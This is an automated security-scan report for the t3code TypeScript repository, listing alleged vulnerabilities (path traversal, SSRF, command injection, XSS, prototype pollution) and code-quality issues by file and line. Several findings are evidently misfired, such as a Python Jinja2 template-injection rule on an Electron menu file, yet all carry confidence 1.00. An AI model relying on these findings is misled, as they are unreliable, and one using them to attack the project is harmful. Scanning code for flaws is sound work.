https://github.com/pingdotgg/t3code ·
lang: typescript ·
LOC: ·
source: both
| Rule | Severity | Count |
|---|---|---|
AIC003 Duplicated implementation block across source files |
low | 14 |
SEC045 eval()/exec() on stored or user-supplied data |
medium | 3 |
MINED045 Ts Non Null Assertion |
info | 3 |
SEC040 innerHTML XSS — template literal with server-supplied data |
high | 3 |
MINED054 Ts As Any |
info | 3 |
MINED044 Js Console Log Prod |
info | 3 |
MINED058 React Dangerously Set Html |
info | 3 |
SEC114 path.join / Path() on user-controlled segment without conta… |
high | 3 |
SEC085 JS: child_process.exec with non-literal |
high | 3 |
MINED027 React State Array Mutation |
high | 3 |
MINED019
Ssti Jinja From String
CWE-94
apps/desktop/src/electron/ElectronMenu.ts:145
· conf 1.00
[MINED019] Ssti Jinja From String: jinja2.Environment().from_string(user_input) — full RCE via templates.JRN009
Secret-like setting is echoed into a password input value
apps/web/src/components/desktop/SshPasswordPromptDialog.tsx:191
· conf 0.83
Secret-like setting is echoed into a password input valueMINED027
React State Array Mutation
CWE-682
apps/server/integration/TestProviderAdapter.integration.ts:298
· conf 1.00
[MINED027] React State Array Mutation: state.X.push/splice/sort followed by setState — React skips re-render on mutated reference.MINED027
React State Array Mutation
CWE-682
apps/server/src/processRunner.ts:174
· conf 1.00
[MINED027] React State Array Mutation: state.X.push/splice/sort followed by setState — React skips re-render on mutated reference.MINED027
React State Array Mutation
CWE-682
apps/server/src/provider/Layers/ClaudeAdapter.ts:1143
· conf 1.00
[MINED027] React State Array Mutation: state.X.push/splice/sort followed by setState — React skips re-render on mutated reference.SEC013
Path Traversal — User Input in File Path
apps/server/src/ws.ts:1106
· conf 0.80
[SEC013] Path Traversal — User Input in File Path: User-controlled input used in file path without sanitization. Allows reading arbitrary files.SEC013
Path Traversal — User Input in File Path
apps/web/src/components/ChatView.tsx:1928
· conf 0.80
[SEC013] Path Traversal — User Input in File Path: User-controlled input used in file path without sanitization. Allows reading arbitrary files.SEC013
Path Traversal — User Input in File Path
apps/web/src/environmentApi.ts:11
· conf 0.80
[SEC013] Path Traversal — User Input in File Path: User-controlled input used in file path without sanitization. Allows reading arbitrary files.SEC029
Server-Side Request Forgery (SSRF) — outbound HTTP from user input
apps/desktop/scripts/dev-electron.mjs:13
· conf 1.00
[SEC029] Server-Side Request Forgery (SSRF) — outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.25…SEC029
Server-Side Request Forgery (SSRF) — outbound HTTP from user input
apps/desktop/src/backend/DesktopBackendManager.ts:183
· conf 1.00
[SEC029] Server-Side Request Forgery (SSRF) — outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.25…SEC029
Server-Side Request Forgery (SSRF) — outbound HTTP from user input
apps/desktop/src/backend/DesktopServerExposure.ts:83
· conf 1.00
[SEC029] Server-Side Request Forgery (SSRF) — outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.25…SEC033
Prototype Pollution — unfiltered merge of user object
apps/server/src/provider/Layers/ProviderRegistry.ts:403
· conf 1.00
[SEC033] Prototype Pollution — unfiltered merge of user object: Merging user-controlled object into a target without filtering `__proto__`/`constructor`/`prototype` keys lets attackers inject propert…SEC038
HTTP Request Smuggling Risk — TE/CL mismatch
apps/server/src/auth/http.ts:63
· conf 1.00
[SEC038] HTTP Request Smuggling Risk — TE/CL mismatch: HTTP Request Smuggling (HRS) abuses parser disagreement between front-end and back-end servers about request boundaries when Transfer-Encoding a…SEC040
innerHTML XSS — template literal with server-supplied data
apps/server/src/keybindings.ts:431
· conf 1.00
[SEC040] innerHTML XSS — template literal with server-supplied data: Setting .innerHTML with a template literal that interpolates server-supplied or user-supplied data is the canonical stored/reflect…SEC040
innerHTML XSS — template literal with server-supplied data
apps/server/src/persistence/Migrations.ts:129
· conf 1.00
[SEC040] innerHTML XSS — template literal with server-supplied data: Setting .innerHTML with a template literal that interpolates server-supplied or user-supplied data is the canonical stored/reflect…SEC040
innerHTML XSS — template literal with server-supplied data
apps/server/src/process/externalLauncher.ts:334
· conf 1.00
[SEC040] innerHTML XSS — template literal with server-supplied data: Setting .innerHTML with a template literal that interpolates server-supplied or user-supplied data is the canonical stored/reflect…SEC083
JS: new RegExp() with non-literal
apps/server/src/provider/Layers/CodexSessionRuntime.ts:49
· conf 1.00
[SEC083] JS: new RegExp() with non-literal: new RegExp(<variable>) — variable input can craft a ReDoS pattern. Ported from eslint-plugin-security detect-non-literal-regexp (Apache-2.0).SEC085
JS: child_process.exec with non-literal
apps/server/src/cli/config.ts:410
· conf 1.00
[SEC085] JS: child_process.exec with non-literal: child_process.exec with user-derived input enables command injection. Ported from eslint-plugin-security detect-child-process (Apache-2.0).SEC085
JS: child_process.exec with non-literal
apps/server/src/diagnostics/ProcessDiagnostics.ts:85
· conf 1.00
[SEC085] JS: child_process.exec with non-literal: child_process.exec with user-derived input enables command injection. Ported from eslint-plugin-security detect-child-process (Apache-2.0).SEC085
JS: child_process.exec with non-literal
apps/server/src/git/GitManager.ts:153
· conf 1.00
[SEC085] JS: child_process.exec with non-literal: child_process.exec with user-derived input enables command injection. Ported from eslint-plugin-security detect-child-process (Apache-2.0).SEC100
CORS permissive Access-Control-Allow-Origin: *
apps/server/src/httpCors.ts:10
· conf 1.00
[SEC100] CORS permissive Access-Control-Allow-Origin: *: Permissive CORS policy (`*` origin) allows any website to make authenticated cross-origin requests. Especially dangerous when combined with `A…SEC114
path.join / Path() on user-controlled segment without containment check
apps/desktop/src/app/DesktopEnvironment.ts:155
· conf 1.00
[SEC114] path.join / Path() on user-controlled segment without containment check: filepath.Clean / path.Join on attacker-supplied segments does NOT prevent escape from the base directory. `../../../e…SEC114
path.join / Path() on user-controlled segment without containment check
apps/desktop/src/electron/ElectronProtocol.ts:125
· conf 1.00
[SEC114] path.join / Path() on user-controlled segment without containment check: filepath.Clean / path.Join on attacker-supplied segments does NOT prevent escape from the base directory. `../../../e…SEC114
path.join / Path() on user-controlled segment without containment check
apps/server/src/attachmentPaths.ts:23
· conf 1.00
[SEC114] path.join / Path() on user-controlled segment without containment check: filepath.Clean / path.Join on attacker-supplied segments does NOT prevent escape from the base directory. `../../../e…SEC128
Async function without await — fire-and-forget Promise (AI mistake)
apps/desktop/scripts/wait-for-resources.mjs:29
· conf 1.00
[SEC128] Async function without await — fire-and-forget Promise (AI mistake): Async call invoked without `await` returns an unhandled Promise. The outer function resolves before the inner work comple…SEC128
Async function without await — fire-and-forget Promise (AI mistake)
apps/desktop/src/electron/ElectronProtocol.ts:220
· conf 1.00
[SEC128] Async function without await — fire-and-forget Promise (AI mistake): Async call invoked without `await` returns an unhandled Promise. The outer function resolves before the inner work comple…SEC128
Async function without await — fire-and-forget Promise (AI mistake)
apps/desktop/src/electron/ElectronWindow.ts:118
· conf 1.00
[SEC128] Async function without await — fire-and-forget Promise (AI mistake): Async call invoked without `await` returns an unhandled Promise. The outer function resolves before the inner work comple…AGT016
Codex session log reader may expose prompts or tool-call content
apps/server/src/provider/Layers/CodexAdapter.ts:2
· conf 0.73
Codex session log reader may expose prompts or tool-call contentERR002
[ERR002] Empty Catch Block: Empty catch blocks hide errors.
apps/web/src/components/KeybindingsToast.browser.tsx:596
· conf 1.00
[ERR002] Empty Catch Block: Empty catch blocks hide errors.ERR002
[ERR002] Empty Catch Block: Empty catch blocks hide errors.
apps/web/src/components/settings/SettingsPanels.browser.tsx:491
· conf 1.00
[ERR002] Empty Catch Block: Empty catch blocks hide errors.SEC031
Catastrophic Backtracking Regex (ReDoS)
packages/shared/src/git.ts:14
· conf 1.00
[SEC031] Catastrophic Backtracking Regex (ReDoS): Regex contains nested quantifiers like `(a+)+` or quantified alternation with overlapping branches. On adversarial input these patterns exhibit expon…SEC041
Tabnabbing — target="_blank" without rel="noopener noreferrer"
apps/web/src/localApi.ts:63
· conf 1.00
[SEC041] Tabnabbing — target="_blank" without rel="noopener noreferrer": <a target="_blank"> without rel="noopener noreferrer" leaks window.opener to the opened page. The opened page can then run win…SEC045
eval()/exec() on stored or user-supplied data
apps/server/src/cli/config.ts:410
· conf 1.00
[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data — even admin-stored data — is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ …SEC045
eval()/exec() on stored or user-supplied data
apps/server/src/diagnostics/ProcessDiagnostics.ts:85
· conf 1.00
[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data — even admin-stored data — is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ …SEC045
eval()/exec() on stored or user-supplied data
apps/server/src/git/GitManager.ts:153
· conf 1.00
[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data — even admin-stored data — is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ …SEC087
JS: weak Math.random for crypto
apps/web/src/components/ComposerPromptEditor.tsx:78
· conf 1.00
[SEC087] JS: weak Math.random for crypto: Math.random() is not cryptographically secure; using it for tokens/keys/nonces is predictable. Ported from gosec G404 / eslint detect-pseudoRandomBytes conce…SEC087
JS: weak Math.random for crypto
apps/web/src/components/ui/sidebar.tsx:894
· conf 1.00
[SEC087] JS: weak Math.random for crypto: Math.random() is not cryptographically secure; using it for tokens/keys/nonces is predictable. Ported from gosec G404 / eslint detect-pseudoRandomBytes conce…AIC003
Duplicated implementation block across source files
apps/server/src/persistence/Layers/ProjectionTurns.ts:50
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
apps/server/src/provider/acp/AcpRuntimeModel.ts:222
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
apps/server/src/provider/Drivers/CodexDriver.ts:40
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
apps/server/src/provider/Drivers/CursorDriver.ts:46
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
apps/server/src/provider/Drivers/CursorDriver.ts:136
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
apps/server/src/provider/Drivers/OpenCodeDriver.ts:21
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
apps/server/src/provider/Drivers/OpenCodeDriver.ts:90
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
apps/server/src/provider/Drivers/OpenCodeDriver.ts:140
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
apps/server/src/sourceControl/GitLabSourceControlProvider.ts:28
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
apps/server/src/textGeneration/CodexTextGeneration.ts:21
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
apps/server/src/textGeneration/CursorTextGeneration.ts:56
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
apps/server/src/textGeneration/CursorTextGeneration.ts:237
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
apps/server/src/textGeneration/OpenCodeTextGeneration.ts:332
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
apps/web/src/components/ui/combobox.tsx:59
· conf 0.86
Duplicated implementation block across source filesSEC132
String concat where the language has interpolation (AI style drift)
packages/ssh/src/tunnel.ts:204
· conf 1.00
[SEC132] String concat where the language has interpolation (AI style drift): String built by concatenation where the language has cleaner interpolation (Python f-strings since 3.6, JS template liter…MINED043
Http Not Https
CWE-319
apps/desktop/src/backend/DesktopServerExposure.ts:118
· conf 1.00
[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data.MINED043
Http Not Https
CWE-319
apps/desktop/src/backend/tailscaleEndpointProvider.ts:47
· conf 1.00
[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data.MINED043
Http Not Https
CWE-319
apps/server/src/serverRuntimeStartup.ts:248
· conf 1.00
[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data.MINED044
Js Console Log Prod
CWE-532
apps/desktop/scripts/electron-launcher.mjs:101
· conf 1.00
[MINED044] Js Console Log Prod: console.log left in code. Should be replaced with logger or removed.MINED044
Js Console Log Prod
CWE-532
apps/server/src/cli/auth.ts:109
· conf 1.00
[MINED044] Js Console Log Prod: console.log left in code. Should be replaced with logger or removed.MINED044
Js Console Log Prod
CWE-532
apps/server/src/cli/project.ts:284
· conf 1.00
[MINED044] Js Console Log Prod: console.log left in code. Should be replaced with logger or removed.MINED045
Ts Non Null Assertion
CWE-476
apps/desktop/src/app/DesktopApp.ts:74
· conf 1.00
[MINED045] Ts Non Null Assertion: x! asserts not null - bypasses null checks - TypeError if wrong.MINED045
Ts Non Null Assertion
CWE-476
apps/desktop/src/app/DesktopLifecycle.ts:216
· conf 1.00
[MINED045] Ts Non Null Assertion: x! asserts not null - bypasses null checks - TypeError if wrong.MINED045
Ts Non Null Assertion
CWE-476
apps/desktop/src/settings/DesktopSavedEnvironments.ts:283
· conf 1.00
[MINED045] Ts Non Null Assertion: x! asserts not null - bypasses null checks - TypeError if wrong.MINED049
Print Pii
CWE-532
apps/server/src/cli/auth.ts:183
· conf 1.00
[MINED049] Print Pii: Logging password/token/email/ssn directly to stdout.MINED052
Ts Any Typed
CWE-704
apps/web/src/rpc/wsRpcClient.ts:29
· conf 1.00
[MINED052] Ts Any Typed: : any used as type annotation. Defeats TypeScript type safety.MINED054
Ts As Any
CWE-704
apps/desktop/src/electron/ElectronApp.ts:51
· conf 1.00
[MINED054] Ts As Any: Casting to any (as any) bypasses type checking entirely.MINED054
Ts As Any
CWE-704
apps/server/src/persistence/NodeSqliteClient.ts:126
· conf 1.00
[MINED054] Ts As Any: Casting to any (as any) bypasses type checking entirely.MINED054
Ts As Any
CWE-704
apps/web/src/routeTree.gen.ts:30
· conf 1.00
[MINED054] Ts As Any: Casting to any (as any) bypasses type checking entirely.MINED058
React Dangerously Set Html
CWE-79
apps/web/src/components/ChatMarkdown.tsx:218
· conf 1.00
[MINED058] React Dangerously Set Html: dangerouslySetInnerHTML bypasses Reacts JSX escaping. Pair with DOMPurify or never use with user data.MINED058
React Dangerously Set Html
CWE-79
apps/web/src/components/chat/SkillInlineText.tsx:79
· conf 1.00
[MINED058] React Dangerously Set Html: dangerouslySetInnerHTML bypasses Reacts JSX escaping. Pair with DOMPurify or never use with user data.MINED058
React Dangerously Set Html
CWE-79
apps/web/src/components/ComposerPromptEditor.tsx:258
· conf 1.00
[MINED058] React Dangerously Set Html: dangerouslySetInnerHTML bypasses Reacts JSX escaping. Pair with DOMPurify or never use with user data.Reading from rp.scan + rp.finding + rp.rule (unified schema, R78 series). Legacy data path unchanged. Compare with /scan/3e304f99-33d8-432c-ba4f-ecda6509fa62/.